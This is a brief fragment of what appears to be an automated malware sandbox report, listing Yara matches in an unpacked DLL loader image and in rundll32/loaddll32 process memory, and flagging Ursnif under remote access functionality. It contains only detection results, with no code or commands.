Source: Yara match File source: 0.2.loaddll32.exe.30194a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4576, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 4876, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif